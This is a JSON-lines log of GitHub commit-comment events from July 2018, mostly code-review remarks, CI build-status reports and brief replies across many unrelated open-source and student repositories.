{"id":"7960476818","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29695799,"position":null,"line":null,"path":null,"commit_id":"04ad2bcff201f0ac5a19d3c6b416c6a54914567e","created_at":"2018-07-13T07:23:04Z","updated_at":"2018-07-13T07:23:04Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2313 of 2313 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-04ad2bcff201f0ac5a19d3c6b416c6a54914567e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-04ad2bcff201f0ac5a19d3c6b416c6a54914567e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-04ad2bcff201f0ac5a19d3c6b416c6a54914567e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-13T07:23:04Z"}
{"id":"7960500702","type":"CommitCommentEvent","actor":{"login":"vindard"},"repo":{"name":"peakshift/telegram-dogecoin"},"payload":{"comment":{"id":29695870,"position":null,"line":null,"path":null,"commit_id":"046d68f8c3a415a4b462e8228e25476d46860e2b","created_at":"2018-07-13T07:28:59Z","updated_at":"2018-07-13T07:28:59Z","author_association":"COLLABORATOR","body":"I figured out a workaround to getting the status:fail object. It's [not directly callable](https://stackoverflow.com/questions/51318203/try-except-exception-as-variable#comment89612647_51318203) inside the blockio python module, so one workaround is to call it again as a cURL and get the object from there:\r\n\r\n`url_fail = 'https://block.io/api/v2/withdraw_from_labels/?'+\\`\r\n`\t        'api_key='+os.environ['BLOCKIO_API_KEY']+\\`\r\n`\t        '&from_labels='+username+\\`\r\n`\t        '&to_addresses='+address+\\`\r\n`\t        '&amounts='+str(amount)`\r\n`data = requests.get(url_fail, data={\"offset\": n}).json()`\r\n\r\nWe could [also request](https://stackoverflow.com/questions/51318203/try-except-exception-as-variable#comment89614710_51318203) that the rest of the object be returned as a separate attribute from the blockio team so that we're not double calling and wasting time/computes."}},"created_at":"2018-07-13T07:28:59Z"}
{"id":"7960501473","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29695872,"position":null,"line":null,"path":null,"commit_id":"d9bc225878a39ae28a88b195c16efbd2e92c4efe","created_at":"2018-07-13T07:29:11Z","updated_at":"2018-07-13T07:29:11Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-784](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-784).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-784-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-13T07:29:11Z"}
{"id":"7960505169","type":"CommitCommentEvent","actor":{"login":"mickelson"},"repo":{"name":"mickelson/attract"},"payload":{"comment":{"id":29695880,"position":null,"line":null,"path":null,"commit_id":"2ce5d1e881609945928829d5b5888b764cc4ad08","created_at":"2018-07-13T07:30:05Z","updated_at":"2018-07-13T07:30:05Z","author_association":"OWNER","body":"@oomek ok the windows packages for 2.4 should be patched with your sfml glyph fix.  could you test and confirm?:\r\n \r\nhttps://github.com/mickelson/attract/releases/tag/v2.4.0"}},"created_at":"2018-07-13T07:30:05Z"}
{"id":"7960511798","type":"CommitCommentEvent","actor":{"login":"accuminium"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29695894,"position":69,"line":133,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-13T07:31:38Z","updated_at":"2018-07-13T07:31:38Z","author_association":"MEMBER","body":"Why is `gen` a suffix instead of a prefix? We use suffixes to denote types, ports, and polarity in signals, whereas we use prefixes to denote instances. In my opinion, the name of a generate construct should be **prefixed** `gen` since I view it as more similar to an instance than a port or type."}},"created_at":"2018-07-13T07:31:38Z"}
{"id":"7960513580","type":"CommitCommentEvent","actor":{"login":"TubeLiu"},"repo":{"name":"TubeLiu/java4yunda"},"payload":{"comment":{"id":29695898,"position":null,"line":null,"path":null,"commit_id":"07ce68fd6392cfaf5496bcdd7195bd3995eda57d","created_at":"2018-07-13T07:32:05Z","updated_at":"2018-07-13T07:32:05Z","author_association":"OWNER","body":"123q"}},"created_at":"2018-07-13T07:32:05Z"}
{"id":"7960516703","type":"CommitCommentEvent","actor":{"login":"paris-ci"},"repo":{"name":"sakiroll/DHV3"},"payload":{"comment":{"id":29695908,"position":null,"line":null,"path":null,"commit_id":"03db9bd6faf4723aa7201d5fd6bbf2b1ee258d46","created_at":"2018-07-13T07:32:49Z","updated_at":"2018-07-13T07:32:49Z","author_association":"NONE","body":"This is already getting fixed on the official version :D. We actually use LingoHub as a translation platform, feel free to join us! Come to the DH server and ask me (eyesofcreeper) for it"}},"created_at":"2018-07-13T07:32:49Z"}
{"id":"7960522788","type":"CommitCommentEvent","actor":{"login":"mmoscher"},"repo":{"name":"modell-aachen/AutoTemplatePlugin"},"payload":{"comment":{"id":29695917,"position":3,"line":31,"path":"data/System/AutoTemplatePlugin.txt","commit_id":"8204fc36bdd2339813cdd173cf892b3098a6eaff","created_at":"2018-07-13T07:34:19Z","updated_at":"2018-07-13T07:34:19Z","author_association":"NONE","body":"jetzt sind's vier :smiley: "}},"created_at":"2018-07-13T07:34:19Z"}
{"id":"7960527946","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"hnes/libaco"},"payload":{"comment":{"id":29695927,"position":null,"line":null,"path":null,"commit_id":"571c5b7d75bcd15c4eb81258c5cad9ac5bd5618e","created_at":"2018-07-13T07:35:32Z","updated_at":"2018-07-13T07:35:32Z","author_association":"NONE","body":"Why did you mix changes for different issues?"}},"created_at":"2018-07-13T07:35:32Z"}
{"id":"7960528091","type":"CommitCommentEvent","actor":{"login":"MeiGuddet"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29695929,"position":null,"line":null,"path":null,"commit_id":"779dac3fab749797a69b4a83a0c9096e04549551","created_at":"2018-07-13T07:35:35Z","updated_at":"2018-07-13T07:35:35Z","author_association":"COLLABORATOR","body":"👍 "}},"created_at":"2018-07-13T07:35:35Z"}
{"id":"7960535262","type":"CommitCommentEvent","actor":{"login":"mmoscher"},"repo":{"name":"modell-aachen/AutoTemplatePlugin"},"payload":{"comment":{"id":29695942,"position":19,"line":56,"path":"data/System/AutoTemplatePlugin.txt","commit_id":"8204fc36bdd2339813cdd173cf892b3098a6eaff","created_at":"2018-07-13T07:37:21Z","updated_at":"2018-07-13T07:37:21Z","author_association":"NONE","body":"Typo im Beispiel "}},"created_at":"2018-07-13T07:37:21Z"}
{"id":"7960537483","type":"CommitCommentEvent","actor":{"login":"Alexinger"},"repo":{"name":"Alexinger/keratin-mk-ua"},"payload":{"comment":{"id":29695947,"position":null,"line":null,"path":null,"commit_id":"18972d7a988e01a5ca134fb73bfa4f728589fe8b","created_at":"2018-07-13T07:37:54Z","updated_at":"2018-07-13T07:37:54Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Instagram checklist](https://trello.com/c/xiKiCTFM/37-instagram-checklist)"}},"created_at":"2018-07-13T07:37:54Z"}
{"id":"7960544495","type":"CommitCommentEvent","actor":{"login":"Kokan"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29695959,"position":73,"line":464,"path":"modules/redisq/logqueue-redis.c","commit_id":"f270978d0a7b669f65eb7d3b91ec66cf2bd90c6f","created_at":"2018-07-13T07:39:39Z","updated_at":"2018-07-13T07:39:39Z","author_association":"MEMBER","body":"Please follow the naming convention. This function operates on `LogQueueRedis`, it's name should represent that.\r\nFor example `log_queue_redis_new`.\r\n\r\nA little information about `new`, `free`, `init`, `deinit`.\r\n* `new` should allocate the memory, and set default values in the structure. (set virtual functions).\r\n* `free` should as its name suggest deallocate memory. (Everything connected to the structure, in some case deallocation means calling unref, if the used structure is reference counted).\r\n* `init` it should operate on structures created by `new`, and it should make the structure operational: opening files, starting threads, timers anything that is needed for the working object. The `init` might be called twice or more, without `deinit`, and it should be handle it.\r\n* `deinit` it should not deallocate, but rather stop those items that have been started with `init` or later with other functions."}},"created_at":"2018-07-13T07:39:39Z"}
{"id":"7960545845","type":"CommitCommentEvent","actor":{"login":"mmoscher"},"repo":{"name":"modell-aachen/WorkflowAppPlugin"},"payload":{"comment":{"id":29695962,"position":5,"line":14,"path":"lib/Foswiki/Plugins/WorkflowAppPlugin/Assets/templates/WebPreferences.txt","commit_id":"0c8a444b37963bd3f5ea82ecd7b3e52fead16178","created_at":"2018-07-13T07:39:58Z","updated_at":"2018-07-13T07:39:58Z","author_association":"CONTRIBUTOR","body":"Ist das korrekt das sie nun ein Suffix \"Template\" haben? Hatte sie unten nicht. ggf. korrigieren. Wenn's so passt - umso besser :)"}},"created_at":"2018-07-13T07:39:58Z"}
{"id":"7960550867","type":"CommitCommentEvent","actor":{"login":"jvmancuso"},"repo":{"name":"OpenMined/PySyft"},"payload":{"comment":{"id":29695974,"position":26,"line":70,"path":"syft/core/utils.py","commit_id":"b11162f1e61221cab6114c8acba450723e7bc53f","created_at":"2018-07-13T07:41:09Z","updated_at":"2018-07-13T07:41:09Z","author_association":"MEMBER","body":"Remove unnecessary prints"}},"created_at":"2018-07-13T07:41:09Z"}
{"id":"7960553782","type":"CommitCommentEvent","actor":{"login":"jvmancuso"},"repo":{"name":"OpenMined/PySyft"},"payload":{"comment":{"id":29695979,"position":34,"line":74,"path":"syft/core/utils.py","commit_id":"b11162f1e61221cab6114c8acba450723e7bc53f","created_at":"2018-07-13T07:41:50Z","updated_at":"2018-07-13T07:41:50Z","author_association":"MEMBER","body":"Raise a ValueError here instead of printing"}},"created_at":"2018-07-13T07:41:50Z"}
{"id":"7960556605","type":"CommitCommentEvent","actor":{"login":"oskarfranzen"},"repo":{"name":"oskarfranzen/bpm"},"payload":{"comment":{"id":29695983,"position":null,"line":null,"path":null,"commit_id":"f53fd9dd0a777edad175e6cbfcb1ecaf52af6ca4","created_at":"2018-07-13T07:42:31Z","updated_at":"2018-07-13T07:42:31Z","author_association":"OWNER","body":"There should be one here :) \r\nhttps://github.com/bencmbrook/bpm/pull/6\r\n"}},"created_at":"2018-07-13T07:42:31Z"}
{"id":"7960557760","type":"CommitCommentEvent","actor":{"login":"joaomoreno"},"repo":{"name":"joaomoreno/github-sharp-theme"},"payload":{"comment":{"id":29695986,"position":null,"line":null,"path":null,"commit_id":"9644d99733ccbb0a61b2c9a6858b09737d03de7e","created_at":"2018-07-13T07:42:47Z","updated_at":"2018-07-13T07:42:47Z","author_association":"OWNER","body":"@ShayBox Here it is: https://github.com/kencrocken/FiraCodeiScript"}},"created_at":"2018-07-13T07:42:47Z"}
{"id":"7960558361","type":"CommitCommentEvent","actor":{"login":"Dtx-Cuy"},"repo":{"name":"Anime4000/IFME"},"payload":{"comment":{"id":29695989,"position":null,"line":null,"path":null,"commit_id":"c7d5817a0925df2fc140a0dc40719325e7a1e623","created_at":"2018-07-13T07:42:56Z","updated_at":"2018-07-13T07:42:56Z","author_association":"NONE","body":"\r\n![ms](https://user-images.githubusercontent.com/37208534/42678984-c2373952-86aa-11e8-9e93-47f4eb2ee327.png)\r\nAdd more rows..\r\nand can be up to 00:00:00.000\r\nsuch as avs cutter in megui"}},"created_at":"2018-07-13T07:42:56Z"}
{"id":"7960559916","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"hnes/libaco"},"payload":{"comment":{"id":29695992,"position":null,"line":null,"path":null,"commit_id":"7290791cc1a2ee81ee04c3f85e6c16fe2b32fef6","created_at":"2018-07-13T07:43:17Z","updated_at":"2018-07-13T07:43:17Z","author_association":"NONE","body":"Why did you add such a make script when [better variants can be generated by other known tools](https://github.com/hnes/libaco/issues/5 \"Addition of a build system generator\")?"}},"created_at":"2018-07-13T07:43:17Z"}
{"id":"7960562785","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29695994,"position":8,"line":8,"path":"lesson4/cargoTrain.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T07:43:58Z","updated_at":"2018-07-13T07:43:58Z","author_association":"NONE","body":"Сделай в подклассах только метод определения \"правильности\" вагона, а сами методы добавления вынеси в базовый класс, и в этих методах вызывай метод определения вагона. Т.е. в подклассах будет только то, что различается, а в базовом - все общее. У тебя сейчас методы в подклассах различаются только логикой проверки типа вагона."}},"created_at":"2018-07-13T07:43:58Z"}
{"id":"7960565387","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29695999,"position":32,"line":142,"path":"gui/core_gui/CCalibFromPlanesGui.cpp","commit_id":"85e4eb9d68662ab2fc2828f2ce56918621700ce9","created_at":"2018-07-13T07:44:34Z","updated_at":"2018-07-13T07:44:34Z","author_association":"NONE","body":"I do not think that publishing messages needs to be done in a different thread, as this takes almost no time. You should only use the threads for heavier tasks"}},"created_at":"2018-07-13T07:44:34Z"}
{"id":"7960571610","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29696012,"position":4,"line":97,"path":"gui/viewer/CViewerContainer.cpp","commit_id":"85e4eb9d68662ab2fc2828f2ce56918621700ce9","created_at":"2018-07-13T07:46:01Z","updated_at":"2018-07-13T07:46:01Z","author_association":"NONE","body":"Wouldn't be more concise to create a vector of m_input_viewer, in order to avoid the switch?"}},"created_at":"2018-07-13T07:46:01Z"}
{"id":"7960573984","type":"CommitCommentEvent","actor":{"login":"kloetzl"},"repo":{"name":"kloetzl/Mash"},"payload":{"comment":{"id":29696017,"position":null,"line":null,"path":null,"commit_id":"ac8e0ade6e2738b7c2a6e100914cd2ee6681b324","created_at":"2018-07-13T07:46:35Z","updated_at":"2018-07-13T07:46:35Z","author_association":"OWNER","body":"Yes, I should. ☺"}},"created_at":"2018-07-13T07:46:35Z"}
{"id":"7960574577","type":"CommitCommentEvent","actor":{"login":"0954517662"},"repo":{"name":"0954517662/max"},"payload":{"comment":{"id":29696021,"position":2,"line":28,"path":"README.md","commit_id":"ea6beaf006b8ac4189221fd5e6f5190568ce175d","created_at":"2018-07-13T07:46:43Z","updated_at":"2018-07-13T07:46:43Z","author_association":"OWNER","body":"https://github.com/haremarmza/CoCoMoreBot"}},"created_at":"2018-07-13T07:46:43Z"}
{"id":"7960574746","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696022,"position":4,"line":4,"path":"lesson4/cargoTrain.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T07:46:46Z","updated_at":"2018-07-13T07:46:46Z","author_association":"NONE","body":"Инишалайз можно вынести в супер-класс. У подклассов поездов на данный момент отличается только type. Значит, что именно этот метод должен быть в подклассе."}},"created_at":"2018-07-13T07:46:46Z"}
{"id":"7960577939","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29696032,"position":null,"line":null,"path":null,"commit_id":"ad5b8883142952c89eb3e68500cd5e5399950e54","created_at":"2018-07-13T07:47:32Z","updated_at":"2018-07-13T07:47:32Z","author_association":"NONE","body":"Are you planning 4200000 games LTC tuning session?"}},"created_at":"2018-07-13T07:47:32Z"}
{"id":"7960578573","type":"CommitCommentEvent","actor":{"login":"sprayzcs"},"repo":{"name":"PiTsLaP/Auto-Vermietung-Software"},"payload":{"comment":{"id":29696033,"position":1,"line":1,"path":"Kunde.txt","commit_id":"bf5e855d3ac15e996ef58ec4e04a5e82f3552601","created_at":"2018-07-13T07:47:40Z","updated_at":"2018-07-13T07:47:40Z","author_association":"NONE","body":"rip"}},"created_at":"2018-07-13T07:47:40Z"}
{"id":"7960579908","type":"CommitCommentEvent","actor":{"login":"wujialiang999"},"repo":{"name":"wujialiang999/WebGISWork"},"payload":{"comment":{"id":29696038,"position":null,"line":null,"path":null,"commit_id":"53bea761f71701f8e2ff3a293c2384894569ba80","created_at":"2018-07-13T07:47:59Z","updated_at":"2018-07-13T07:47:59Z","author_association":"OWNER","body":"这是我个人的WebGIS期末作业，放在这里方便在其他地方编写代码。"}},"created_at":"2018-07-13T07:47:59Z"}
{"id":"7960585529","type":"CommitCommentEvent","actor":{"login":"IldarMurzenkov"},"repo":{"name":"IldarMurzenkov/Rep02"},"payload":{"comment":{"id":29696050,"position":null,"line":null,"path":null,"commit_id":"7526ad8d2c11c9d83df73e9cf31fb21902b78ba3","created_at":"2018-07-13T07:49:17Z","updated_at":"2018-07-13T07:49:17Z","author_association":"OWNER","body":"Please check"}},"created_at":"2018-07-13T07:49:17Z"}
{"id":"7960587202","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696054,"position":4,"line":4,"path":"lesson4/cargoWagon.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T07:49:39Z","updated_at":"2018-07-13T07:49:39Z","author_association":"NONE","body":"Тут тоже, что и в CargoTrain. Достаточно, если тут будет просто метод #type"}},"created_at":"2018-07-13T07:49:39Z"}
{"id":"7960592838","type":"CommitCommentEvent","actor":{"login":"nils-petersson"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29696065,"position":14,"line":null,"path":"plugin/eqdetect/source/dextool/plugin/eqdetect/backend/parser.d","commit_id":"f443125fbc4ab8c68b7e92c0a92eed80bd8fa140","created_at":"2018-07-13T07:50:57Z","updated_at":"2018-07-13T07:50:57Z","author_association":"NONE","body":"Thanks! That is fixed now :)"}},"created_at":"2018-07-13T07:50:57Z"}
{"id":"7960594085","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696067,"position":11,"line":11,"path":"lesson4/main.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T07:51:14Z","updated_at":"2018-07-13T07:51:14Z","author_association":"NONE","body":"Этот класс лучше вынести в отдельный файл и подключать его тут. Тогда main.rb у нас будет высокоуровневой абстракцией без какой-либо логики."}},"created_at":"2018-07-13T07:51:14Z"}
{"id":"7960594460","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":29696070,"position":5,"line":57,"path":"plugins/UpdateChecker/UpdateChecker.py","commit_id":"60340c70a86b367b1bcd37eac0dad7b463b59375","created_at":"2018-07-13T07:51:20Z","updated_at":"2018-07-13T07:51:20Z","author_association":"MEMBER","body":"Fixed here: https://github.com/Ultimaker/Uranium/commit/1f43b824f785a500e395d3911260af508c1cd2c7\r\nAnd here: https://github.com/Ultimaker/Cura/commit/302072bd6e8c6ee1d3b44a3d39486bcf08e24722"}},"created_at":"2018-07-13T07:51:20Z"}
{"id":"7960601574","type":"CommitCommentEvent","actor":{"login":"kloetzl"},"repo":{"name":"kloetzl/Mash"},"payload":{"comment":{"id":29696081,"position":null,"line":null,"path":null,"commit_id":"d0f0f9ab577013142bf56c2a7026e003132ab51b","created_at":"2018-07-13T07:53:06Z","updated_at":"2018-07-13T07:53:06Z","author_association":"OWNER","body":"> The commit has a poor title: \"increase performance\".\r\n\r\nVery true.\r\n\r\n> What do you mean ? Will the code work if there is the letter 'N' ?\r\n\r\nI do not have a definitive answer at the moment."}},"created_at":"2018-07-13T07:53:06Z"}
{"id":"7960602140","type":"CommitCommentEvent","actor":{"login":"meta-ajay-vijay"},"repo":{"name":"meta-ajay-vijay/GET2018"},"payload":{"comment":{"id":29696084,"position":null,"line":null,"path":null,"commit_id":"729b6c6618bf6d2ba1f21bb75a43f544fde7b159","created_at":"2018-07-13T07:53:15Z","updated_at":"2018-07-13T07:53:15Z","author_association":"OWNER","body":"hello"}},"created_at":"2018-07-13T07:53:15Z"}
{"id":"7960602639","type":"CommitCommentEvent","actor":{"login":"vlonchuk"},"repo":{"name":"vlonchuk/uberats-demo-frontend"},"payload":{"comment":{"id":29696087,"position":3,"line":1,"path":"README.md","commit_id":"36f82ea8c763747c55d90145dd46d08a6cb0b185","created_at":"2018-07-13T07:53:21Z","updated_at":"2018-07-13T07:53:21Z","author_association":"OWNER","body":"Init commit"}},"created_at":"2018-07-13T07:53:21Z"}
{"id":"7960603873","type":"CommitCommentEvent","actor":{"login":"rohitpatienttrials"},"repo":{"name":"RocketChat/Rocket.Chat.js.SDK"},"payload":{"comment":{"id":29696093,"position":43,"line":449,"path":"README.md","commit_id":"27f7bd415b55a23fd8b71944f9e88763effaee3a","created_at":"2018-07-13T07:53:37Z","updated_at":"2018-07-13T07:53:37Z","author_association":"NONE","body":"dfsd\r\n"}},"created_at":"2018-07-13T07:53:37Z"}
{"id":"7960605210","type":"CommitCommentEvent","actor":{"login":"QuChenyi0110"},"repo":{"name":"QuChenyi0110/Lover"},"payload":{"comment":{"id":29696096,"position":null,"line":null,"path":null,"commit_id":"2148b8a5f9db2865634f79e8e347734b9f8d1193","created_at":"2018-07-13T07:53:54Z","updated_at":"2018-07-13T07:53:54Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-13T07:53:54Z"}
{"id":"7960607413","type":"CommitCommentEvent","actor":{"login":"davidanthoff"},"repo":{"name":"davidanthoff/TableShowUtils.jl"},"payload":{"comment":{"id":29696106,"position":1,"line":1,"path":"appveyor.yml","commit_id":"ca9639b91e851c0d68465c58873a2044dc4aabf5","created_at":"2018-07-13T07:54:24Z","updated_at":"2018-07-13T07:54:24Z","author_association":"OWNER","body":"Ah, that is fantastic, didn't know about it!"}},"created_at":"2018-07-13T07:54:24Z"}
{"id":"7960611542","type":"CommitCommentEvent","actor":{"login":"StephanOsthold"},"repo":{"name":"modell-aachen/WorkflowAppPlugin"},"payload":{"comment":{"id":29696122,"position":5,"line":14,"path":"lib/Foswiki/Plugins/WorkflowAppPlugin/Assets/templates/WebPreferences.txt","commit_id":"0c8a444b37963bd3f5ea82ecd7b3e52fead16178","created_at":"2018-07-13T07:55:21Z","updated_at":"2018-07-13T07:55:21Z","author_association":"CONTRIBUTOR","body":"Zugegeben, habe ich in dem Moment nicht drüber nachgedacht, aber in dem Fall ist das tatsächlich in Ordung.\r\nWenn ich ein Template mit komplettem Namen angebe (inkl. web und Template-suffix) durchsucht das Wiki nicht z.B. in System & Co. sondern nimmt das dort angegebene."}},"created_at":"2018-07-13T07:55:21Z"}
{"id":"7960611908","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29696125,"position":null,"line":null,"path":null,"commit_id":"dbd43386ed1b1380b8000c394514a978fab29277","created_at":"2018-07-13T07:55:26Z","updated_at":"2018-07-13T07:55:26Z","author_association":"COLLABORATOR","body":"Wann oder wie aktualisieren sich die Kurse?"}},"created_at":"2018-07-13T07:55:26Z"}
{"id":"7960617260","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29696141,"position":53,"line":252,"path":"gui/viewer/CViewerContainer.cpp","commit_id":"1157f5acc8f25f23b897c627d72789afcea7726d","created_at":"2018-07-13T07:56:37Z","updated_at":"2018-07-13T07:56:37Z","author_association":"NONE","body":"I also think that we can remove the switch here making input_tab_widget an std::array, that would reduce some lines of code and increases readability"}},"created_at":"2018-07-13T07:56:37Z"}
{"id":"7960618137","type":"CommitCommentEvent","actor":{"login":"mmoscher"},"repo":{"name":"modell-aachen/WorkflowAppPlugin"},"payload":{"comment":{"id":29696142,"position":5,"line":14,"path":"lib/Foswiki/Plugins/WorkflowAppPlugin/Assets/templates/WebPreferences.txt","commit_id":"0c8a444b37963bd3f5ea82ecd7b3e52fead16178","created_at":"2018-07-13T07:56:50Z","updated_at":"2018-07-13T07:56:50Z","author_association":"CONTRIBUTOR","body":"Okay, top"}},"created_at":"2018-07-13T07:56:50Z"}
{"id":"7960628148","type":"CommitCommentEvent","actor":{"login":"bigsinger"},"repo":{"name":"bigsinger/AndroidIdChanger"},"payload":{"comment":{"id":29696147,"position":null,"line":null,"path":null,"commit_id":"aa993d8ba58863e1d922efcd609943a462626bf2","created_at":"2018-07-13T07:59:05Z","updated_at":"2018-07-13T07:59:05Z","author_association":"OWNER","body":"请告诉对的格式是什么"}},"created_at":"2018-07-13T07:59:05Z"}
{"id":"7960630403","type":"CommitCommentEvent","actor":{"login":"astefanutti"},"repo":{"name":"jboss-fuse/application-templates"},"payload":{"comment":{"id":29696160,"position":18,"line":37,"path":"fis-image-streams.json","commit_id":"400bea1de0fd576e5ab4f256f2c314268a1c0a0c","created_at":"2018-07-13T07:59:34Z","updated_at":"2018-07-13T07:59:34Z","author_association":"CONTRIBUTOR","body":"@bparees Ah I see that's problematic when you do upgrades. PM saw it as as a way to avoid new users using older versions but we overlooked it can break existing ones. Let me remove that change. Thanks for the feedback. "}},"created_at":"2018-07-13T07:59:34Z"}
{"id":"7960630616","type":"CommitCommentEvent","actor":{"login":"Kokan"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29696162,"position":26,"line":77,"path":"modules/redisq/redisq.c","commit_id":"f270978d0a7b669f65eb7d3b91ec66cf2bd90c6f","created_at":"2018-07-13T07:59:37Z","updated_at":"2018-07-13T07:59:37Z","author_association":"MEMBER","body":"The creation of the redis queue should be in the `acquire` queue function.\r\nThe responsibilities:\r\n* `attach` this tasks is to attach the current plugin to the `DestinationDriver`, by attach I mean adding its own hooks to the DD functions.\r\n\r\nThe `release` and `acquire` actually the DD functions, which we want to change, when a destination driver wants to initialize it has to get a queue, and the DD internal init shall handle if there is no queue to get. The acquire queue should return with `NULL`, if it cannot connect to redis."}},"created_at":"2018-07-13T07:59:37Z"}
{"id":"7960631699","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29696164,"position":8,"line":84,"path":"resources/qml/JobSpecs.qml","commit_id":"bb313c45a9465d4097b3b4d3a31ed6f99ceca278","created_at":"2018-07-13T07:59:51Z","updated_at":"2018-07-13T07:59:51Z","author_association":"MEMBER","body":"Yes. Fixed here: 5e4ccf004daf3fa8bf75b27676f69f86bd345142"}},"created_at":"2018-07-13T07:59:51Z"}
{"id":"7960633478","type":"CommitCommentEvent","actor":{"login":"sybdata"},"repo":{"name":"sybdata/proxyAlpine"},"payload":{"comment":{"id":29696171,"position":null,"line":null,"path":null,"commit_id":"390234a385f27ca1a4eb202689077d79c81475b3","created_at":"2018-07-13T08:00:14Z","updated_at":"2018-07-13T08:00:14Z","author_association":"OWNER","body":"![schema_gatewayhost](https://user-images.githubusercontent.com/24189833/42679832-85b91e36-8683-11e8-86cd-db453ef04e79.png)\r\n"}},"created_at":"2018-07-13T08:00:14Z"}
{"id":"7960639979","type":"CommitCommentEvent","actor":{"login":"bencaowang"},"repo":{"name":"bencaowang/bcw-Repository"},"payload":{"comment":{"id":29696188,"position":null,"line":null,"path":null,"commit_id":"eabf0592614bbb6b965dcad454fbaf2b3d50b1bc","created_at":"2018-07-13T08:01:36Z","updated_at":"2018-07-13T08:01:36Z","author_association":"OWNER","body":"啊山东科技发你看剑圣打"}},"created_at":"2018-07-13T08:01:36Z"}
{"id":"7960640249","type":"CommitCommentEvent","actor":{"login":"katrinleinweber"},"repo":{"name":"swcarpentry/r-novice-inflammation"},"payload":{"comment":{"id":29696190,"position":null,"line":null,"path":null,"commit_id":"68f8826e3e8bf086fc621af0305dea39e120baa9","created_at":"2018-07-13T08:01:39Z","updated_at":"2018-07-13T08:01:39Z","author_association":"COLLABORATOR","body":"This fixes #325, not #235. 🙄 "}},"created_at":"2018-07-13T08:01:39Z"}
{"id":"7960640557","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29696192,"position":49,"line":49,"path":"lesson4/main.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T08:01:43Z","updated_at":"2018-07-13T08:01:43Z","author_association":"NONE","body":"Поправь меня, если я не прав. Сейчас выходит, что если мы создали станцию то в ```@obj``` у нас будет последняя станция. И если после этого, мы выбираем опцию do_action то дейставия будут возможно только с этой станцией. То есть программа нам не позволяет добавить станцию и после этого сделать действия например с маршрутом."}},"created_at":"2018-07-13T08:01:43Z"}
